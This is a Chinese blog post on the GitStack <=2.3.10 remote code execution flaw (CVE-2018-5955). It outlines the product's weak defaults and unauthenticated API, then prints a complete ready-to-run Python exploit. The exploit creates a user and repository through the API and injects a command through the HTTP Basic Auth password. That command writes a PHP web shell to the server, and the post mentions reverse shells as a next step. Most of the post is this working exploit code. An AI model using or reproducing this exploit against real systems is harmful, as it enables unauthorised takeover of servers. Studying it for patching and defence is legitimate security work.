zoukankan      html  css  js  c++  java
  • GitStack系统RCE漏洞学习

    漏洞简介



    漏洞简情


    • 漏洞程序 GitStack
    • 影响版本 <=2.3.10
    • 漏洞类型 RCE
    • 漏洞评价 高危
    • 漏洞编号 CVE-2018-5955

    漏洞程序介绍


    GitStack是一款基于Python(Django框架)和PHP的win平台下的git可视化平台。它存在很多问题,下面简单介绍一下所有的背景安全问题。这些背景安全问题将导致RCE漏洞的利用。

    背景安全问题



    默认弱口令admin/admin,以及口令提示


    debug模式开启,泄露敏感信息


    https://a.b.c.d/rest/settings/general/admin/
    可以获取足够的有效信息

    API未授权访问


    举例如下:


    RCE漏洞利用思路以及EXP




    先利用未授权的api创建用户,然后利用未授权的api创建项目,然后把用户加入项目中。
    我们来看EXP的代码部分:

    def __userCheck(self):
            '''用户检查'''
            url = '%s/rest/user/'%self.target
            try:
                usersJson = requests.get(url, verify=False).json()
            except Exception, reason:
                print '[-] 连接GitStackAPI失败'
                exit(0)
            try:
                usersJson.remove('admin')
                usersJson.remove('eyeryone')
            except Exception, reason:
                pass
            if len(usersJson) > 0 and 'pentest' in usersJson:
                self.user = 'pentest'
                print '[+] 发现可用账户:',self.user
            else:
                try:
                    response = requests.post(url, data={'username':'pentest', 'password':'pentest'}, verify=False)
                except Exception, reason:
                    print '[-] 创建用户失败'
                    exit(0)
                if 'User created' not in response.text:
                    print '[-] 创建用户失败'
                    exit(0)
                else:
                    print '[+] 创建用户成功'
                    self.user = 'pentest'
    
        def __repositoryCheck(self):
            '''项目检查'''
            url = '%s/rest/repository/'%self.target
            try:
                repositoryJson = requests.get(url, verify=False).json()
            except Exception, reason:
                print '[-] 连接GitStackAPI失败'
                exit(0)
            if repositoryJson:
                repository = repositoryJson[0]['name']
                print '[+] 发现可用项目:',repository
                self.repository = repository
            else:
                try:
                    response = requests.post(url, cookies={'csrftoken':'pentest'}, data={'name':'pentestgit', 'csrfmiddlewaretoken':'pentest'})
                except Exception, reason:
                    print '[-] 创建项目失败'
                    exit(0)
                if 'successfully create repository' not in response.text:
                    print '[-] 创建项目失败'
                    exit(0)
                else:
                    print '[+] 创建项目成功'
                    self.repository = 'pentestgit'
    
        def __permissionCheck(self):
            '''权限检查'''
            url = url = '%s/rest/repository/%s'%(self.target,self.repository)
            try:
                response = requests.get(url, verify=False)
            except Exception, reason:
                print '[-] 权限检查失败'
                exit(0)
            users = response.json()['user_write_list']
            flag = False
            if len(users) > 0:
                if self.user in [x['username'] for x in users]:
                    print '[+] 权限检查成功'
                    flag = True
            if not flag:
                url = '%s/rest/repository/%s/user/%s/'%(self.target, self.repository, self.user)
                try:
                    response = requests.post(url, verify=False)
                except Exception, reason:
                    print '[-] 加载权限失败'
                    exit(0)
                try:
                    response = requests.get(url, verify=False)
                except Exception, reason:
                    print '[-] 验证权限失败'
                    exit(0)
                if 'true' in response.text:
                    print '[+] 权限加载成功'
                else:
                    print '[-] 权限验证失败'
                    exit(0)
    
    

    然后访问index.php,在访问index.php的时候访问该项目的时候回对用户名密码进行验证,这个地方使用的HttpBasicAuth进行验证,在password字段存在RCE漏洞,可有在这个地方构造Payload利用执行,然后就可以写入一句话,菜刀连接也好,反弹shell也好,创建用户名密码远程登录也好,都可以操作了。

    def __attack(self):
            '''攻击尝试'''
            url = '%s/web/index.php?p=%s.git&a=summary'%(self.target, self.repository)
            try:
                response = requests.get(url, auth=HTTPBasicAuth(self.user, self.payload), verify=False)
            except Exception, reason:
                print '[-] 攻击失败'
                exit(0)
            url = '%s/web/gitstack.php'%self.target
            try:
                response = requests.get(url, verify=False)
            except Exception, reason:
                print '[-] 验证攻击失败'
                exit(0)
            if response.status_code == 200:
                print '[+] 攻击成功'
            else:
                print '[-] 尝试访问无效,攻击失败'
                exit(0)
    

    完整代码如下:


    #!/usr/bin/env python
    # -*- coding:utf-8 -*-
    
    '''
    CVE-2018-5955 GitStack<= 2.3.10 远程命令执行漏洞 EXP 改进版
    借鉴POC作者:CaijiOrz(GitHub账号)
    作者:b0b@c
    使用:仅限于学习、交流、公司内部使用
    '''
    
    import requests
    from optparse import OptionParser
    from requests.auth import HTTPBasicAuth
    
    class Exploitor(object):
        '''Rce漏洞利用器'''
        def __init__(self, target, abusepath='c:\GitStack\gitphp', payload=None):
            '''Rce漏洞利用器创建'''
            self.target = target
            self.abusepath = abusepath
            if payload == None:
                self.payload = "p && echo ^<?php echo @system($_POST['cmd']) ?^> > %s\gitstack.php"%self.abusepath
            else:
                self.payload = "p && echo ^<?php %s ?^> > %s\gitstack.php"%(self.payload, self.abusepath)
    
        def __userCheck(self):
            '''用户检查'''
            url = '%s/rest/user/'%self.target
            try:
                usersJson = requests.get(url, verify=False).json()
            except Exception, reason:
                print '[-] 连接GitStackAPI失败'
                exit(0)
            try:
                usersJson.remove('admin')
                usersJson.remove('eyeryone')
            except Exception, reason:
                pass
            if len(usersJson) > 0 and 'pentest' in usersJson:
                self.user = 'pentest'
                print '[+] 发现可用账户:',self.user
            else:
                try:
                    response = requests.post(url, data={'username':'pentest', 'password':'pentest'}, verify=False)
                except Exception, reason:
                    print '[-] 创建用户失败'
                    exit(0)
                if 'User created' not in response.text:
                    print '[-] 创建用户失败'
                    exit(0)
                else:
                    print '[+] 创建用户成功'
                    self.user = 'pentest'
    
        def __repositoryCheck(self):
            '''项目检查'''
            url = '%s/rest/repository/'%self.target
            try:
                repositoryJson = requests.get(url, verify=False).json()
            except Exception, reason:
                print '[-] 连接GitStackAPI失败'
                exit(0)
            if repositoryJson:
                repository = repositoryJson[0]['name']
                print '[+] 发现可用项目:',repository
                self.repository = repository
            else:
                try:
                    response = requests.post(url, cookies={'csrftoken':'pentest'}, data={'name':'pentestgit', 'csrfmiddlewaretoken':'pentest'})
                except Exception, reason:
                    print '[-] 创建项目失败'
                    exit(0)
                if 'successfully create repository' not in response.text:
                    print '[-] 创建项目失败'
                    exit(0)
                else:
                    print '[+] 创建项目成功'
                    self.repository = 'pentestgit'
    
        def __permissionCheck(self):
            '''权限检查'''
            url = url = '%s/rest/repository/%s'%(self.target,self.repository)
            try:
                response = requests.get(url, verify=False)
            except Exception, reason:
                print '[-] 权限检查失败'
                exit(0)
            users = response.json()['user_write_list']
            flag = False
            if len(users) > 0:
                if self.user in [x['username'] for x in users]:
                    print '[+] 权限检查成功'
                    flag = True
            if not flag:
                url = '%s/rest/repository/%s/user/%s/'%(self.target, self.repository, self.user)
                try:
                    response = requests.post(url, verify=False)
                except Exception, reason:
                    print '[-] 加载权限失败'
                    exit(0)
                try:
                    response = requests.get(url, verify=False)
                except Exception, reason:
                    print '[-] 验证权限失败'
                    exit(0)
                if 'true' in response.text:
                    print '[+] 权限加载成功'
                else:
                    print '[-] 权限验证失败'
                    exit(0)
    
        def __attack(self):
            '''攻击尝试'''
            url = '%s/web/index.php?p=%s.git&a=summary'%(self.target, self.repository)
            try:
                response = requests.get(url, auth=HTTPBasicAuth(self.user, self.payload), verify=False)
            except Exception, reason:
                print '[-] 攻击失败'
                exit(0)
            url = '%s/web/gitstack.php'%self.target
            try:
                response = requests.get(url, verify=False)
            except Exception, reason:
                print '[-] 验证攻击失败'
                exit(0)
            if response.status_code == 200:
                print '[+] 攻击成功'
            else:
                print '[-] 尝试访问无效,攻击失败'
                exit(0)
    
        def attack(self):
            '''攻击过程'''
            self.__userCheck()
            self.__repositoryCheck()
            self.__permissionCheck()
            self.__attack()
    
    
    if __name__ == '__main__':
        parser = OptionParser()
        parser.add_option("-t", "--target", dest="target", help="Set Target")
        parser.add_option("-p", "--payload", dest="payload", help="Set Payload")
        parser.add_option("-f", "--filepath", dest="filepath", help="Set FilePath")
        (options, args) = parser.parse_args()
        if options.target in [None,'']:
            print '[-] 请输入目标URL'
            exit(0)
        else:
            if options.payload == None and options.filepath  == None:
                attacker = Exploitor(options.target)
            elif options.payload != None and options.filepath == None:
                attacker = Exploitor(options.target, payload=options.payload)
            elif options.payload == None and options.filepath != None:
                attacker = Exploitor(options.target, abusepath=options.filepath)
            elif options.payload != None and options.filepath != None:
                attacker = Exploitor(options.target, abusepath=options.filepath, payload=options.payload)
            attacker.attack()
    
    

    鸣谢



    参考项目 https://github.com/CaijiOrz/exploits/blob/master/GitStack_2.3.10_Unauthenticated_RCE.py
    参考博客 https://xz.aliyun.com/t/2235

  • 相关阅读:
    hdu 5100 n*n棋盘放k*1长方条最多覆盖面积
    poj 3635/hdu 1676 Full Tank? 车辆加油+最短路
    poj 3613 经过k条边最短路 floyd+矩阵快速幂
    2014上海全国邀请赛 解题报告
    漫谈程序员系列:看看你离优秀有多远
    C2第七次作业解题报告
    C++ STL
    hdu 5098 双队列拓扑排序
    深度学习数据集 近百个开源数据集
    helper工具包——基于cifar10数据集的cnn分类模型的模块
  • 原文地址:https://www.cnblogs.com/KevinGeorge/p/9626931.html
Copyright © 2011-2022 走看看